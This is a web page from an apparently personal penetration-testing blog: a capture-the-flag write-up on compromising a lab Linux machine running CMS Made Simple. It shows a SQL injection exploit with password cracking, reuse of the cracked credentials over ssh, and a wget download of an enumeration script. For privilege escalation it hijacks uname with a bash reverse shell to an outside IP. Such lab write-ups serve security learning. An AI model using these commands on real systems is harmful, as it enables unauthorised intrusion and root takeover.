<!doctype html>
<html lang="en" dir="ltr" class="blog-wrapper blog-post-page plugin-blog plugin-id-default" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.7.0">
<title data-rh="true">Writeup | Penetration Testing Journal</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:url" content="https://danae-pan.github.io/Blog/blog/Writeup"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docusaurus_tag" content="default"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docsearch:docusaurus_tag" content="default"><meta data-rh="true" property="og:title" content="Writeup | Penetration Testing Journal"><meta data-rh="true" name="description" content="Task 1"><meta data-rh="true" property="og:description" content="Task 1"><meta data-rh="true" property="og:type" content="article"><meta data-rh="true" property="article:published_time" content="2025-05-12T00:00:00.000Z"><meta data-rh="true" property="article:tag" content="easy,linux"><link data-rh="true" rel="canonical" href="https://danae-pan.github.io/Blog/blog/Writeup"><link data-rh="true" rel="alternate" href="https://danae-pan.github.io/Blog/blog/Writeup" hreflang="en"><link data-rh="true" rel="alternate" href="https://danae-pan.github.io/Blog/blog/Writeup" hreflang="x-default"><script data-rh="true" type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","@id":"https://danae-pan.github.io/Blog/blog/Writeup","mainEntityOfPage":"https://danae-pan.github.io/Blog/blog/Writeup","url":"https://danae-pan.github.io/Blog/blog/Writeup","headline":"Writeup","name":"Writeup","description":"Task 1","datePublished":"2025-05-12T00:00:00.000Z","author":[],"keywords":[],"isPartOf":{"@type":"Blog","@id":"https://danae-pan.github.io/Blog/blog","name":"Intro to Red Team"}}</script><link rel="alternate" type="application/rss+xml" href="/Blog/blog/rss.xml" title="Penetration Testing Journal RSS Feed">
<link rel="alternate" type="application/atom+xml" href="/Blog/blog/atom.xml" title="Penetration Testing Journal Atom Feed"><link rel="stylesheet" href="/Blog/assets/css/styles.e69e0e8b.css">
<script src="/Blog/assets/js/runtime~main.8235e083.js" defer="defer"></script>
<script src="/Blog/assets/js/main.ec90ef52.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<script>!function(){function t(t){document.documentElement.setAttribute("data-theme",t)}var e=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();t(null!==e?e:"dark")}(),function(){try{const n=new URLSearchParams(window.location.search).entries();for(var[t,e]of n)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="navbar navbar--fixed-top"><div class="navbar__inner"><div class="navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/Blog/"><b class="navbar__title text--truncate">About Me</b></a><a class="navbar__item navbar__link" href="/Blog/docs/phases/Introduction">Guides</a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/Blog/blog/">Write Ups</a></div><div class="navbar__items navbar__items--right"><a class="navbar__item navbar__link" href="/Blog/docs/stories/Brain: the first computer virus">Bedtime Stories</a><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="main-wrapper mainWrapper_z2l0"><div class="container margin-vert--lg"><div class="row"><aside class="col col--3"><nav class="sidebar_re4s thin-scrollbar" aria-label="Blog recent posts navigation"><div class="sidebarItemTitle_pO2u margin-bottom--md">Recent posts</div><div role="group"><h3 class="yearGroupHeading_rMGB">2025</h3><ul class="sidebarItemList_Yudw clean-list"><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/SteamCloud">Steam Cloud</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/TwoMillion">Two Million</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Cicada">Cicada</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/BoardLight">Board Light</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Driver">Driver</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Precious">Precious</a></li><li class="sidebarItem__DBe"><a aria-current="page" class="sidebarItemLink_mo7H sidebarItemLinkActive_I1ZP" href="/Blog/blog/Writeup">Writeup</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Paper">Paper</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Devvortex">Devvortex</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/GoodGames">Good Games</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Sau">Sau</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Jerry">Jerry</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Cap">Cap</a></li></ul></div></nav></aside><main class="col col--7"><article class=""><header><h1 class="title_f1Hy">Writeup</h1><div class="container_mt6G margin-vert--md"><time datetime="2025-05-12T00:00:00.000Z">May 12, 2025</time> · <!-- -->3 min read</div></header><div id="__blog-post-container" class="markdown"><h3 class="anchor anchorWithStickyNavbar_LWe7" id="task-1">Task 1<a href="#task-1" class="hash-link" aria-label="Direct link to Task 1" title="Direct link to Task 1">​</a></h3>
<p>Submit user flag.</p>
<p>Opening the browser to the IP address of the target it is revealed that the web site uses DDoS protection.</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-2-edee0b487498a35ab805b00c27472d19.png" width="1600" height="536" class="img_ev3q"></p>
<p>Navigating to <code>/robots.txt</code> we can see that there is a path called <code>writeup/</code>.</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-3-fd2dfec598f7f566bc34c6788ff09209.png" width="1366" height="666" class="img_ev3q"></p>
<p>The <code>writeup/</code> path shows the following page:</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-4-e99f4bf3d12c749acf74390dadd83c18.png" width="1914" height="964" class="img_ev3q"></p>
<p>Running <code>whatweb</code> against the website <code>whatweb &lt;target_ip&gt;/writeup -v</code> we find the CMS to be <code>CMS Made Simple</code>.</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-5-ea80ef4d3ec4d054597c85373da15a6d.png" width="2146" height="438" class="img_ev3q"></p>
<p>We can then try the directories used which can be found at <code>http://svn.cmsmadesimple.org/svn/cmsmadesimple/trunk/</code>.</p>
<p>Trying out the path <code>admin/</code> we get a pop-up to authenticate, default credentials <code>username=admin</code> and <code>password=admin</code> did not get us in.</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-6-309cf4b61982bcc6601ef5fd7ffc18a6.png" width="1042" height="610" class="img_ev3q"></p>
<p>Next, other directories are being tried to find the version of the CMS. At <code>doc/CHANGELOG.txt</code> we found that the version is 2.2.9.1.</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-7-ab253a260d6d01db60452538f318c328.png" width="1042" height="492" class="img_ev3q"></p>
<p>Using <code>searchsploit CMS Made Simple</code> we search for exploits and find versions lower than 2.2.10 are vulnerable to SQL Injection.</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-8-c074d0f78a42b5f2bf32d1349d5aad5e.png" width="1420" height="106" class="img_ev3q"></p>
<p>We can then copy the exploit from searchsploitby running <code>searchsploit -m php/webapps/46635.py</code> and run it by <code>python3 46635.py -u http://&lt;target_ip&gt;/writeup/ -c -w rocktou.txt</code> where the -c switch is specified to crack the detected password. The script detects the credentials which we can then use for the admin login prompt. This did not work but after trying ssh with the same credentials <code>ssh &lt;username&gt;@&lt;target_ip&gt;</code> we get in and find the user flag on the home directory of the user by <code>cat user.txt</code>.</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="task-2">Task 2<a href="#task-2" class="hash-link" aria-label="Direct link to Task 2" title="Direct link to Task 2">​</a></h3>
<p>Submit root flag.</p>
<p>To see if we can exploit any vulnerabilities on the target machine we run the script for Linux Enumeration. After getting the bash file on the host machine, we open a server on port 8000, on the directory we downloaded the file to, using the command<br>
<code>python3 -m http.server 8000</code></p>
<p>On the target machine we run<br>
<code>wget http://10.10.14.85:8000/LinEnum.sh -O /tmp/LinEnum.sh</code></p>
<p>After running the script, we find the user being on the staff group which allows users to add local modifications to the system (<code>/usr/local</code>) without needing root privileges. This means if root runs a script or command, and that command is resolved to your version in <code>/usr/local/bin</code>, it will run your code as root.</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-9-985c767c3720e2eb3c46f8351d77f770.png" width="1600" height="224" class="img_ev3q"></p>
<p>We run the following to see which services or scripts might be impacted by <code>/usr/local/bin</code>:
<code>grep -r &quot;/usr/local/bin&quot; /etc/profile* /etc/bash.bashrc /etc/pam.d /etc/update-motd.d 2&gt;/dev/null</code>.
We confirm that <code>/usr/local/bin</code> is part of the <code>PATH</code> environment and that the update-motd system executes <code>uname</code>. Then, we verify that <code>/etc/update-motd.d/10-uname</code> indeed runs <code>uname</code>, meaning it could execute our payload if replaced:</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-10-5c472f014f25d9d3690f00b4ba9b9548.png" width="1788" height="320" class="img_ev3q"></p>
<p>Since <code>/usr/local/bin</code> comes first in the <code>PATH</code>, we can hijack <code>uname</code> with our own reverse shell payload.</p>
<p>We first start a listener on our machine:<br>
<code>nc -lvnp 4444</code></p>
<p>Then we overwrite <code>uname</code> with a malicious script in <code>/usr/local/bin/uname</code>:<br>
<code>echo -e &#x27;#!/bin/bash\n/bin/bash -i &gt;&amp; /dev/tcp/10.10.14.85/4444 0&gt;&amp;1&#x27; &gt; /usr/local/bin/uname</code><br>
<code>chmod +x /usr/local/bin/uname</code></p>
<p>Now, when the system runs <code>uname</code> during SSH login, it executes our reverse shell and gives us a root shell.</p>
<p>Once the reverse shell connects back, we are root and we can read the root flag.
<code>cd /root</code><br>
<code>cat root.txt</code></p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-w-11-7ae9c2b10a235c9a8e58d3338d2117ec.png" width="1600" height="318" class="img_ev3q"></p></div><footer class="docusaurus-mt-lg"><div class="row margin-top--sm theme-blog-footer-edit-meta-row"><div class="col"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/Blog/blog/tags/easy">easy</a></li><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/Blog/blog/tags/linux">linux</a></li></ul></div></div><div class="row margin-top--sm theme-blog-footer-edit-meta-row"><div class="col"><a href="https://github.com/danae-pan/Blog/blog/Writeup.md" target="_blank" rel="noopener noreferrer" class="theme-edit-this-page"><svg fill="currentColor" height="20" width="20" viewBox="0 0 40 40" class="iconEdit_Z9Sw" aria-hidden="true"><g><path d="m34.5 11.7l-3 3.1-6.3-6.3 3.1-3q0.5-0.5 1.2-0.5t1.1 0.5l3.9 3.9q0.5 0.4 0.5 1.1t-0.5 1.2z m-29.5 17.1l18.4-18.5 6.3 6.3-18.4 18.4h-6.3v-6.2z"></path></g></svg>Edit this page</a></div><div class="col lastUpdated_JAkA"></div></div></footer></article><nav class="pagination-nav docusaurus-mt-lg" aria-label="Blog post page navigation"><a class="pagination-nav__link pagination-nav__link--prev" href="/Blog/blog/Precious"><div class="pagination-nav__sublabel">Newer post</div><div class="pagination-nav__label">Precious</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/Blog/blog/Paper"><div class="pagination-nav__sublabel">Older post</div><div class="pagination-nav__label">Paper</div></a></nav></main><div class="col col--2"><div class="tableOfContents_bqdL thin-scrollbar"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#task-1" class="table-of-contents__link toc-highlight">Task 1</a></li><li><a href="#task-2" class="table-of-contents__link toc-highlight">Task 2</a></li></ul></div></div></div></div></div><footer class="footer footer--dark"><div class="container container-fluid"><div class="row footer__links"><div class="col footer__col"><div class="footer__title">Contact</div><ul class="footer__items clean-list"><li class="footer__item"><a href="https://github.com/danae-pan" target="_blank" rel="noopener noreferrer" class="footer__link-item">GitHub<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li class="footer__item"><a href="https://linkedin.com/in/anastasia-danai-panagiotopoulou" target="_blank" rel="noopener noreferrer" class="footer__link-item">LinkedIn<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li></ul></div></div></div></footer></div>
</body>
</html>